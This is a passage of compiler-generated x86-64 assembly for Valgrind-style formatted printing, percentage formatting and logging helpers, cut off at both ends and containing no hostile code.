.long L3_1_set_32
.long L3_1_set_64
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_92
.long L3_1_set_98
.long L3_1_set_54
.long L3_1_set_98
.long L3_1_set_98
.long L3_1_set_76
.end_data_region
## -- End function
.p2align 4, 0x90 ## -- Begin function myvprintf_int64
_myvprintf_int64: ## @myvprintf_int64
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $144, %rsp
movb %r9b, %al
movq 16(%rbp), %r9
movq ___stack_chk_guard@GOTPCREL(%rip), %r9
movq (%r9), %r9
movq %r9, -8(%rbp)
movq %rdi, -64(%rbp)
movq %rsi, -72(%rbp)
movl %edx, -76(%rbp)
movl %ecx, -80(%rbp)
movl %r8d, -84(%rbp)
movb %al, -85(%rbp)
movl $0, -92(%rbp)
movl $0, -100(%rbp)
movb $0, -101(%rbp)
movzbl -85(%rbp), %edx
leaq L_.str.14(%rip), %rax
leaq L_.str.13(%rip), %rcx
cmpl $0, %edx
cmovneq %rcx, %rax
movq %rax, -112(%rbp)
movl $0, -116(%rbp)
cmpl $2, -80(%rbp)
jl LBB4_2
## %bb.1:
cmpl $16, -80(%rbp)
jle LBB4_3
LBB4_2:
movl -116(%rbp), %eax
movl %eax, -52(%rbp)
jmp LBB4_40
LBB4_3:
movl -76(%rbp), %eax
andl $1, %eax
cmpl $0, %eax
je LBB4_6
## %bb.4:
cmpq $0, 16(%rbp)
jge LBB4_6
## %bb.5:
xorl %eax, %eax
## kill: def $rax killed $eax
subq 16(%rbp), %rax
movq %rax, 16(%rbp)
movb $1, -101(%rbp)
LBB4_6:
cmpq $0, 16(%rbp)
jne LBB4_8
## %bb.7:
movl -92(%rbp), %eax
movl %eax, %ecx
addl $1, %ecx
movl %ecx, -92(%rbp)
cltq
movb $48, -48(%rbp,%rax)
jmp LBB4_17
LBB4_8:
jmp LBB4_9
LBB4_9: ## =>This Inner Loop Header: Depth=1
cmpq $0, 16(%rbp)
jbe LBB4_16
## %bb.10: ## in Loop: Header=BB4_9 Depth=1
movl -76(%rbp), %eax
andl $16, %eax
cmpl $0, %eax
je LBB4_15
## %bb.11: ## in Loop: Header=BB4_9 Depth=1
movl $10, %eax
cmpl -80(%rbp), %eax
jne LBB4_15
## %bb.12: ## in Loop: Header=BB4_9 Depth=1
movl -92(%rbp), %eax
subl -100(%rbp), %eax
movl $3, %ecx
cltd
idivl %ecx
xorl %eax, %eax
cmpl %edx, %eax
jne LBB4_15
## %bb.13: ## in Loop: Header=BB4_9 Depth=1
xorl %eax, %eax
cmpl -92(%rbp), %eax
je LBB4_15
## %bb.14: ## in Loop: Header=BB4_9 Depth=1
movl -92(%rbp), %eax
movl %eax, %ecx
addl $1, %ecx
movl %ecx, -92(%rbp)
cltq
movb $44, -48(%rbp,%rax)
movl -100(%rbp), %eax
addl $1, %eax
movl %eax, -100(%rbp)
LBB4_15: ## in Loop: Header=BB4_9 Depth=1
movq -112(%rbp), %rax
movq %rax, -128(%rbp) ## 8-byte Spill
movq 16(%rbp), %rax
movslq -80(%rbp), %rcx
xorl %edx, %edx
## kill: def $rdx killed $edx
divq %rcx
movq -128(%rbp), %rax ## 8-byte Reload
movb (%rax,%rdx), %cl
movl -92(%rbp), %eax
movl %eax, %edx
addl $1, %edx
movl %edx, -92(%rbp)
cltq
movb %cl, -48(%rbp,%rax)
movslq -80(%rbp), %rcx
movq 16(%rbp), %rax
xorl %edx, %edx
## kill: def $rdx killed $edx
divq %rcx
movq %rax, 16(%rbp)
jmp LBB4_9
LBB4_16:
jmp LBB4_17
LBB4_17:
cmpb $0, -101(%rbp)
je LBB4_19
## %bb.18:
movl -92(%rbp), %eax
movl %eax, %ecx
addl $1, %ecx
movl %ecx, -92(%rbp)
cltq
movb $45, -48(%rbp,%rax)
LBB4_19:
cmpl $0, -84(%rbp)
jle LBB4_28
## %bb.20:
movl -76(%rbp), %eax
andl $4, %eax
cmpl $0, %eax
jne LBB4_28
## %bb.21:
jmp LBB4_22
LBB4_22: ## =>This Inner Loop Header: Depth=1
movl -92(%rbp), %eax
cmpl -84(%rbp), %eax
jge LBB4_27
## %bb.23: ## in Loop: Header=BB4_22 Depth=1
cmpl $39, -92(%rbp)
jle LBB4_25
## %bb.24:
movb $0, -9(%rbp)
jmp LBB4_27
LBB4_25: ## in Loop: Header=BB4_22 Depth=1
movl -76(%rbp), %edx
andl $2, %edx
movl $32, %eax
movl $48, %ecx
cmpl $0, %edx
cmovnel %ecx, %eax
movb %al, %cl
movslq -92(%rbp), %rax
movb %cl, -48(%rbp,%rax)
## %bb.26: ## in Loop: Header=BB4_22 Depth=1
movl -92(%rbp), %eax
addl $1, %eax
movl %eax, -92(%rbp)
jmp LBB4_22
LBB4_27:
jmp LBB4_28
LBB4_28:
movl -92(%rbp), %eax
addl -116(%rbp), %eax
movl %eax, -116(%rbp)
movl -92(%rbp), %eax
subl $1, %eax
movl %eax, -96(%rbp)
LBB4_29: ## =>This Inner Loop Header: Depth=1
cmpl $0, -96(%rbp)
jl LBB4_32
## %bb.30: ## in Loop: Header=BB4_29 Depth=1
movq -64(%rbp), %rax
movslq -96(%rbp), %rcx
movb -48(%rbp,%rcx), %cl
movq -72(%rbp), %rsi
movsbl %cl, %edi
callq *%rax
## %bb.31: ## in Loop: Header=BB4_29 Depth=1
movl -96(%rbp), %eax
addl $-1, %eax
movl %eax, -96(%rbp)
jmp LBB4_29
LBB4_32:
cmpl $0, -84(%rbp)
jle LBB4_39
## %bb.33:
movl -76(%rbp), %eax
andl $4, %eax
cmpl $0, %eax
je LBB4_39
## %bb.34:
jmp LBB4_35
LBB4_35: ## =>This Inner Loop Header: Depth=1
movl -92(%rbp), %eax
cmpl -84(%rbp), %eax
jge LBB4_38
## %bb.36: ## in Loop: Header=BB4_35 Depth=1
movl -116(%rbp), %eax
addl $1, %eax
movl %eax, -116(%rbp)
movq -64(%rbp), %rax
movq -72(%rbp), %rsi
movl $32, %edi
callq *%rax
## %bb.37: ## in Loop: Header=BB4_35 Depth=1
movl -92(%rbp), %eax
addl $1, %eax
movl %eax, -92(%rbp)
jmp LBB4_35
LBB4_38:
jmp LBB4_39
LBB4_39:
movl -116(%rbp), %eax
movl %eax, -52(%rbp)
LBB4_40:
movl -52(%rbp), %eax
movl %eax, -132(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB4_42
## %bb.41:
movl -132(%rbp), %eax ## 4-byte Reload
addq $144, %rsp
popq %rbp
retq
LBB4_42:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function myvprintf_str_XML_simplistic
_myvprintf_str_XML_simplistic: ## @myvprintf_str_XML_simplistic
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movl $0, -28(%rbp)
movq -24(%rbp), %rdi
callq _local_strlen
movl %eax, -36(%rbp)
movl $0, -32(%rbp)
LBB5_1: ## =>This Loop Header: Depth=1
## Child Loop BB5_9 Depth 2
movl -32(%rbp), %eax
cmpl -36(%rbp), %eax
jge LBB5_15
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movq -24(%rbp), %rax
movslq -32(%rbp), %rcx
movsbl (%rax,%rcx), %eax
movl %eax, -52(%rbp) ## 4-byte Spill
subl $38, %eax
je LBB5_3
jmp LBB5_16
LBB5_16: ## in Loop: Header=BB5_1 Depth=1
movl -52(%rbp), %eax ## 4-byte Reload
subl $60, %eax
je LBB5_4
jmp LBB5_17
LBB5_17: ## in Loop: Header=BB5_1 Depth=1
movl -52(%rbp), %eax ## 4-byte Reload
subl $62, %eax
je LBB5_5
jmp LBB5_6
LBB5_3: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.15(%rip), %rax
movq %rax, -48(%rbp)
jmp LBB5_7
LBB5_4: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.16(%rip), %rax
movq %rax, -48(%rbp)
jmp LBB5_7
LBB5_5: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.17(%rip), %rax
movq %rax, -48(%rbp)
jmp LBB5_7
LBB5_6: ## in Loop: Header=BB5_1 Depth=1
movq $0, -48(%rbp)
LBB5_7: ## in Loop: Header=BB5_1 Depth=1
cmpq $0, -48(%rbp)
je LBB5_12
## %bb.8: ## in Loop: Header=BB5_1 Depth=1
jmp LBB5_9
LBB5_9: ## Parent Loop BB5_1 Depth=1
## => This Inner Loop Header: Depth=2
movq -48(%rbp), %rax
cmpb $0, (%rax)
je LBB5_11
## %bb.10: ## in Loop: Header=BB5_9 Depth=2
movq -8(%rbp), %rax
movq -48(%rbp), %rcx
movb (%rcx), %cl
movq -16(%rbp), %rsi
movsbl %cl, %edi
callq *%rax
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
movq -48(%rbp), %rax
addq $1, %rax
movq %rax, -48(%rbp)
jmp LBB5_9
LBB5_11: ## in Loop: Header=BB5_1 Depth=1
jmp LBB5_13
LBB5_12: ## in Loop: Header=BB5_1 Depth=1
movq -8(%rbp), %rax
movq -24(%rbp), %rcx
movslq -32(%rbp), %rdx
movb (%rcx,%rdx), %cl
movq -16(%rbp), %rsi
movsbl %cl, %edi
callq *%rax
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
LBB5_13: ## in Loop: Header=BB5_1 Depth=1
jmp LBB5_14
LBB5_14: ## in Loop: Header=BB5_1 Depth=1
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB5_1
LBB5_15:
movl -28(%rbp), %eax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function toBool
_toBool: ## @toBool
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -4(%rbp)
movl -4(%rbp), %edx
movl $1, %eax
xorl %ecx, %ecx
cmpl $0, %edx
cmovel %ecx, %eax
movl %eax, -8(%rbp)
movl -8(%rbp), %eax
## kill: def $al killed $al killed $eax
movzbl %al, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function myvprintf_str
_myvprintf_str: ## @myvprintf_str
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $112, %rsp
movb %r9b, %al
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movl %edx, -28(%rbp)
movl %ecx, -32(%rbp)
movq %r8, -40(%rbp)
movb %al, -41(%rbp)
movl $0, -48(%rbp)
movq -40(%rbp), %rdi
callq _local_strlen
movl %eax, -60(%rbp)
cmpl $0, -32(%rbp)
jne LBB7_9
## %bb.1:
movl -60(%rbp), %eax
addl -48(%rbp), %eax
movl %eax, -48(%rbp)
movl $0, -52(%rbp)
LBB7_2: ## =>This Inner Loop Header: Depth=1
movl -52(%rbp), %eax
cmpl -60(%rbp), %eax
jge LBB7_8
## %bb.3: ## in Loop: Header=BB7_2 Depth=1
movq -16(%rbp), %rax
movq %rax, -72(%rbp) ## 8-byte Spill
movzbl -41(%rbp), %eax
cmpl $0, %eax
je LBB7_5
## %bb.4: ## in Loop: Header=BB7_2 Depth=1
movq -40(%rbp), %rax
movslq -52(%rbp), %rcx
movsbl (%rax,%rcx), %edi
callq _local_toupper
movsbl %al, %eax
movl %eax, -76(%rbp) ## 4-byte Spill
jmp LBB7_6
LBB7_5: ## in Loop: Header=BB7_2 Depth=1
movq -40(%rbp), %rax
movslq -52(%rbp), %rcx
movsbl (%rax,%rcx), %eax
movl %eax, -76(%rbp) ## 4-byte Spill
LBB7_6: ## in Loop: Header=BB7_2 Depth=1
movq -72(%rbp), %rax ## 8-byte Reload
movl -76(%rbp), %ecx ## 4-byte Reload
## kill: def $cl killed $cl killed $ecx
movq -24(%rbp), %rsi
movsbl %cl, %edi
callq *%rax
## %bb.7: ## in Loop: Header=BB7_2 Depth=1
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB7_2
LBB7_8:
movl -48(%rbp), %eax
movl %eax, -4(%rbp)
jmp LBB7_38
LBB7_9:
movl -60(%rbp), %eax
cmpl -32(%rbp), %eax
jle LBB7_18
## %bb.10:
movl -32(%rbp), %eax
addl -48(%rbp), %eax
movl %eax, -48(%rbp)
movl $0, -52(%rbp)
LBB7_11: ## =>This Inner Loop Header: Depth=1
movl -52(%rbp), %eax
cmpl -32(%rbp), %eax
jge LBB7_17
## %bb.12: ## in Loop: Header=BB7_11 Depth=1
movq -16(%rbp), %rax
movq %rax, -88(%rbp) ## 8-byte Spill
movzbl -41(%rbp), %eax
cmpl $0, %eax
je LBB7_14
## %bb.13: ## in Loop: Header=BB7_11 Depth=1
movq -40(%rbp), %rax
movslq -52(%rbp), %rcx
movsbl (%rax,%rcx), %edi
callq _local_toupper
movsbl %al, %eax
movl %eax, -92(%rbp) ## 4-byte Spill
jmp LBB7_15
LBB7_14: ## in Loop: Header=BB7_11 Depth=1
movq -40(%rbp), %rax
movslq -52(%rbp), %rcx
movsbl (%rax,%rcx), %eax
movl %eax, -92(%rbp) ## 4-byte Spill
LBB7_15: ## in Loop: Header=BB7_11 Depth=1
movq -88(%rbp), %rax ## 8-byte Reload
movl -92(%rbp), %ecx ## 4-byte Reload
## kill: def $cl killed $cl killed $ecx
movq -24(%rbp), %rsi
movsbl %cl, %edi
callq *%rax
## %bb.16: ## in Loop: Header=BB7_11 Depth=1
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB7_11
LBB7_17:
movl -48(%rbp), %eax
movl %eax, -4(%rbp)
jmp LBB7_38
LBB7_18:
movl -32(%rbp), %eax
subl -60(%rbp), %eax
movl %eax, -56(%rbp)
movl -28(%rbp), %eax
andl $4, %eax
cmpl $0, %eax
je LBB7_24
## %bb.19:
movl -56(%rbp), %eax
addl -48(%rbp), %eax
movl %eax, -48(%rbp)
movl $0, -52(%rbp)
LBB7_20: ## =>This Inner Loop Header: Depth=1
movl -52(%rbp), %eax
cmpl -56(%rbp), %eax
jge LBB7_23
## %bb.21: ## in Loop: Header=BB7_20 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rsi
movl $32, %edi
callq *%rax
## %bb.22: ## in Loop: Header=BB7_20 Depth=1
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB7_20
LBB7_23:
jmp LBB7_24
LBB7_24:
movl -60(%rbp), %eax
addl -48(%rbp), %eax
movl %eax, -48(%rbp)
movl $0, -52(%rbp)
LBB7_25: ## =>This Inner Loop Header: Depth=1
movl -52(%rbp), %eax
cmpl -60(%rbp), %eax
jge LBB7_31
## %bb.26: ## in Loop: Header=BB7_25 Depth=1
movq -16(%rbp), %rax
movq %rax, -104(%rbp) ## 8-byte Spill
movzbl -41(%rbp), %eax
cmpl $0, %eax
je LBB7_28
## %bb.27: ## in Loop: Header=BB7_25 Depth=1
movq -40(%rbp), %rax
movslq -52(%rbp), %rcx
movsbl (%rax,%rcx), %edi
callq _local_toupper
movsbl %al, %eax
movl %eax, -108(%rbp) ## 4-byte Spill
jmp LBB7_29
LBB7_28: ## in Loop: Header=BB7_25 Depth=1
movq -40(%rbp), %rax
movslq -52(%rbp), %rcx
movsbl (%rax,%rcx), %eax
movl %eax, -108(%rbp) ## 4-byte Spill
LBB7_29: ## in Loop: Header=BB7_25 Depth=1
movq -104(%rbp), %rax ## 8-byte Reload
movl -108(%rbp), %ecx ## 4-byte Reload
## kill: def $cl killed $cl killed $ecx
movq -24(%rbp), %rsi
movsbl %cl, %edi
callq *%rax
## %bb.30: ## in Loop: Header=BB7_25 Depth=1
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB7_25
LBB7_31:
movl -28(%rbp), %eax
andl $4, %eax
cmpl $0, %eax
jne LBB7_37
## %bb.32:
movl -56(%rbp), %eax
addl -48(%rbp), %eax
movl %eax, -48(%rbp)
movl $0, -52(%rbp)
LBB7_33: ## =>This Inner Loop Header: Depth=1
movl -52(%rbp), %eax
cmpl -56(%rbp), %eax
jge LBB7_36
## %bb.34: ## in Loop: Header=BB7_33 Depth=1
movq -16(%rbp), %rax
movq -24(%rbp), %rsi
movl $32, %edi
callq *%rax
## %bb.35: ## in Loop: Header=BB7_33 Depth=1
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB7_33
LBB7_36:
jmp LBB7_37
LBB7_37:
movl -48(%rbp), %eax
movl %eax, -4(%rbp)
LBB7_38:
movl -4(%rbp), %eax
addq $112, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _VG_vsprintf ## -- Begin function VG_vsprintf
.p2align 4, 0x90
_VG_vsprintf: ## @VG_vsprintf
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq -8(%rbp), %rax
movq %rax, -40(%rbp)
leaq -40(%rbp), %rsi
movq -16(%rbp), %rdx
movq -24(%rbp), %rcx
leaq _add_to__sprintf_buf(%rip), %rdi
callq _VG_debugLog_vprintf
movl %eax, -28(%rbp)
leaq -40(%rbp), %rsi
xorl %edi, %edi
callq _add_to__sprintf_buf
movq -8(%rbp), %rdi
callq _local_strlen
cmpl -28(%rbp), %eax
sete %al
xorb $-1, %al
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB8_2
## %bb.1:
leaq L___func__.VG_vsprintf(%rip), %rdi
leaq L_.str.1(%rip), %rsi
leaq L_.str.2(%rip), %rcx
movl $535, %edx ## imm = 0x217
callq ___assert_rtn
LBB8_2:
jmp LBB8_3
LBB8_3:
movl -28(%rbp), %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function add_to__sprintf_buf
_add_to__sprintf_buf: ## @add_to__sprintf_buf
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %dil, %al
movb %al, -1(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rax
movq %rax, -24(%rbp)
movb -1(%rbp), %cl
movq -24(%rbp), %rdx
movq (%rdx), %rax
movq %rax, %rsi
addq $1, %rsi
movq %rsi, (%rdx)
movb %cl, (%rax)
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function local_strlen
_local_strlen: ## @local_strlen
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
LBB10_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movslq -12(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $0, %eax
je LBB10_3
## %bb.2: ## in Loop: Header=BB10_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB10_1
LBB10_3:
movl -12(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _VG_sprintf ## -- Begin function VG_sprintf
.p2align 4, 0x90
_VG_sprintf: ## @VG_sprintf
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $256, %rsp ## imm = 0x100
testb %al, %al
je LBB11_4
## %bb.3:
movaps %xmm0, -192(%rbp)
movaps %xmm1, -176(%rbp)
movaps %xmm2, -160(%rbp)
movaps %xmm3, -144(%rbp)
movaps %xmm4, -128(%rbp)
movaps %xmm5, -112(%rbp)
movaps %xmm6, -96(%rbp)
movaps %xmm7, -80(%rbp)
LBB11_4:
movq %r9, -200(%rbp)
movq %r8, -208(%rbp)
movq %rcx, -216(%rbp)
movq %rdx, -224(%rbp)
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -40(%rbp)
movq %rsi, -48(%rbp)
leaq -32(%rbp), %rax
leaq -240(%rbp), %rcx
movq %rcx, 16(%rax)
leaq 16(%rbp), %rcx
movq %rcx, 8(%rax)
movl $48, 4(%rax)
movl $16, (%rax)
movq -40(%rbp), %rdi
movq -48(%rbp), %rsi
leaq -32(%rbp), %rdx
callq _VG_vsprintf
movl %eax, -52(%rbp)
leaq -32(%rbp), %rax
movl -52(%rbp), %eax
movl %eax, -244(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB11_2
## %bb.1:
movl -244(%rbp), %eax ## 4-byte Reload
addq $256, %rsp ## imm = 0x100
popq %rbp
retq
LBB11_2:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _VG_percentify ## -- Begin function VG_percentify
.p2align 4, 0x90
_VG_percentify: ## @VG_percentify
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $128, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -56(%rbp)
movq %rsi, -64(%rbp)
movl %edx, -68(%rbp)
movl %ecx, -72(%rbp)
movq %r8, -80(%rbp)
cmpq $0, -64(%rbp)
jne LBB12_2
## %bb.1:
leaq -48(%rbp), %rdi
movl -72(%rbp), %edx
leaq L_.str.3(%rip), %rsi
movb $0, %al
callq _VG_sprintf
movq -80(%rbp), %rdi
leaq -48(%rbp), %rsi
leaq L_.str.4(%rip), %rdx
movb $0, %al
callq _VG_sprintf
jmp LBB12_20
LBB12_2:
imulq $100, -56(%rbp), %rax
xorl %ecx, %ecx
movl %ecx, %edx
divq -64(%rbp)
movq %rax, -104(%rbp)
cmpl $0, -68(%rbp)
jne LBB12_4
## %bb.3:
movq -80(%rbp), %rdi
movq -104(%rbp), %rdx
leaq L_.str.5(%rip), %rsi
movb $0, %al
callq _VG_sprintf
jmp LBB12_10
LBB12_4:
movl -68(%rbp), %eax
movl %eax, -120(%rbp) ## 4-byte Spill
subl $1, %eax
je LBB12_5
jmp LBB12_23
LBB12_23:
movl -120(%rbp), %eax ## 4-byte Reload
subl $2, %eax
je LBB12_6
jmp LBB12_24
LBB12_24:
movl -120(%rbp), %eax ## 4-byte Reload
subl $3, %eax
je LBB12_7
jmp LBB12_8
LBB12_5:
movl $10, -116(%rbp)
jmp LBB12_9
LBB12_6:
movl $100, -116(%rbp)
jmp LBB12_9
LBB12_7:
movl $1000, -116(%rbp) ## imm = 0x3E8
jmp LBB12_9
LBB12_8:
leaq L___func__.VG_percentify(%rip), %rdi
leaq L_.str.1(%rip), %rsi
leaq L_.str.6(%rip), %rcx
movl $587, %edx ## imm = 0x24B
callq ___assert_rtn
LBB12_9:
imulq $100, -56(%rbp), %rax
movl -116(%rbp), %ecx
## kill: def $rcx killed $ecx
imulq %rcx, %rax
xorl %ecx, %ecx
movl %ecx, %edx
divq -64(%rbp)
movl -116(%rbp), %ecx
## kill: def $rcx killed $ecx
xorl %edx, %edx
## kill: def $rdx killed $edx
divq %rcx
movq %rdx, -112(%rbp)
leaq -48(%rbp), %rdi
movl -68(%rbp), %edx
leaq L_.str.7(%rip), %rsi
movb $0, %al
callq _VG_sprintf
movq -80(%rbp), %rdi
leaq -48(%rbp), %rsi
movq -104(%rbp), %rdx
movq -112(%rbp), %rcx
movb $0, %al
callq _VG_sprintf
LBB12_10:
movq -80(%rbp), %rdi
callq _local_strlen
movl %eax, -88(%rbp)
movl -72(%rbp), %eax
subl -88(%rbp), %eax
movl %eax, -92(%rbp)
cmpl $0, -92(%rbp)
jge LBB12_12
## %bb.11:
movl $0, -92(%rbp)
LBB12_12:
movl -88(%rbp), %eax
movl %eax, -84(%rbp)
LBB12_13: ## =>This Inner Loop Header: Depth=1
cmpl $0, -84(%rbp)
jl LBB12_16
## %bb.14: ## in Loop: Header=BB12_13 Depth=1
movq -80(%rbp), %rax
movslq -84(%rbp), %rcx
movb (%rax,%rcx), %dl
movq -80(%rbp), %rax
movl -84(%rbp), %ecx
addl -92(%rbp), %ecx
movslq %ecx, %rcx
movb %dl, (%rax,%rcx)
## %bb.15: ## in Loop: Header=BB12_13 Depth=1
movl -84(%rbp), %eax
addl $-1, %eax
movl %eax, -84(%rbp)
jmp LBB12_13
LBB12_16:
movl $0, -84(%rbp)
LBB12_17: ## =>This Inner Loop Header: Depth=1
movl -84(%rbp), %eax
cmpl -92(%rbp), %eax
jge LBB12_20
## %bb.18: ## in Loop: Header=BB12_17 Depth=1
movq -80(%rbp), %rax
movslq -84(%rbp), %rcx
movb $32, (%rax,%rcx)
## %bb.19: ## in Loop: Header=BB12_17 Depth=1
movl -84(%rbp), %eax
addl $1, %eax
movl %eax, -84(%rbp)
jmp LBB12_17
LBB12_20:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB12_22
## %bb.21:
addq $128, %rsp
popq %rbp
retq
LBB12_22:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _VG_print_translation_stats ## -- Begin function VG_print_translation_stats
.p2align 4, 0x90
_VG_print_translation_stats: ## @VG_print_translation_stats
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl _n_SP_updates_fast(%rip), %eax
addl _n_SP_updates_generic_known(%rip), %eax
addl _n_SP_updates_generic_unknown(%rip), %eax
movl %eax, -12(%rbp)
movl _n_SP_updates_fast(%rip), %eax
movl %eax, %edi
movl -12(%rbp), %eax
movl %eax, %esi
leaq -6(%rbp), %r8
movl $1, %edx
movl $6, %ecx
callq _VG_percentify
movl _n_SP_updates_fast(%rip), %esi
leaq -6(%rbp), %rdx
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _VG_printf
movl _n_SP_updates_generic_known(%rip), %eax
movl %eax, %edi
movl -12(%rbp), %eax
movl %eax, %esi
leaq -6(%rbp), %r8
movl $1, %edx
movl $6, %ecx
callq _VG_percentify
movl _n_SP_updates_generic_known(%rip), %esi
leaq -6(%rbp), %rdx
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _VG_printf
movl _n_SP_updates_generic_unknown(%rip), %eax
movl %eax, %edi
movl -12(%rbp), %eax
movl %eax, %esi
leaq -6(%rbp), %r8
movl $1, %edx
movl $6, %ecx
callq _VG_percentify
movl _n_SP_updates_generic_unknown(%rip), %esi
leaq -6(%rbp), %rdx
leaq L_.str.10(%rip), %rdi
movb $0, %al
callq _VG_printf
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
callq _VG_print_translation_stats
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function vprintf_to_buf
_vprintf_to_buf: ## @vprintf_to_buf
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movl $0, -28(%rbp)
movq -8(%rbp), %rax
movq 520(%rax), %rax
cmpl $0, (%rax)
jge LBB15_2
## %bb.1:
movq -8(%rbp), %rax
movq 520(%rax), %rax
cmpl $-2, (%rax)
jne LBB15_3
LBB15_2:
movq -8(%rbp), %rsi
movq -16(%rbp), %rdx
movq -24(%rbp), %rcx
leaq _add_to__printf_buf(%rip), %rdi
callq _VG_debugLog_vprintf
movl %eax, -28(%rbp)
LBB15_3:
movl -28(%rbp), %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function send_bytes_to_logging_sink
_send_bytes_to_logging_sink: ## @send_bytes_to_logging_sink
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl %edx, -20(%rbp)
movq -16(%rbp), %rdi
movslq -20(%rbp), %rdx
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rcx
movl $1, %esi
callq _fwrite
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
callq _fflush
addq $32, %rsp
